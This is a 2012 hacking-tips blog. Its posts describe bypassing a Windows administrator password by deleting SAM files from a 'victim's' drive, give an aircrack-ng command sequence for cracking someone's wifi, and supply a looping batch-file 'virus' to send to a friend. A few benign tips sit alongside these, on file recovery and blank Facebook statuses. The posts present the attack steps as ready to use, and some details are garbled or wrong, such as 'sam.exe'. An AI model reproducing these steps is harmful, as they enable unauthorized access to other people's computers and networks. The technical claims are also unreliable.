May 07, 2012

How to "Delete administrator Password" without any software

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 
1. Put your hard disk of your computer in any other pc .Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).Step 3. Then open that drive in which the victim’s window(or your window) is installed.Step 4. Go to location windows->system32->configStep 5. And delete SAM.exe and SAM.log 
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)

All (Ctrl+Alt+Del) Permanently deleted files Recovery solution

Sometimes we delete the files permanently, and realize that deleting them is like a Blunder...

For all those folks,
Here is the solution

Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.

Click Here to download the .

1)
To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take upto 10 secs.

2)
When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.

3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).

May 02, 2012

Commands For Hacking Wifi


Hack wifi using backtrack 5 



1-iwconfig

2-airmon-ng start wlan0(wlan0 enabled hnduigh mon0)

3-airodump-ng mon0(baby card name of ur wireless card)

4-airodump-ng -c 10(ch no) --bssid 1001(bssid no) -w crack mon0

5-aireplay-ng -1 0 -a 1001(bssid no) mon0

6-aireplay-ng -3 -b 1001(bssid no) mon0

7-aircrack-ng crack-01.cap



To download backtrack :http://www.backtrack-linux.org/downloads/

Send blank msg or comment or status update in "facebook"

CHAT BOX

COMMENT

STATUS












            




You get bored with the monotony of facebook, how if you create an empty status in your wall of facebook, maybe it's a bit more interesting.

If you want to be different in writing status on facebook, you can write the empty status of the your wall of facebook, Here there are three ways to write the empty status on your facebook wall:


Method :
hold Alt and type 0173 or type 0160 using numpad key.

Like this-

April 30, 2012

Here is a way on how to create a simple batch file virus



Write it in a notepad
Cycle a message in your friend's computer(code is given below)
Type :
Code:

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as "Anything.BAT" and send it.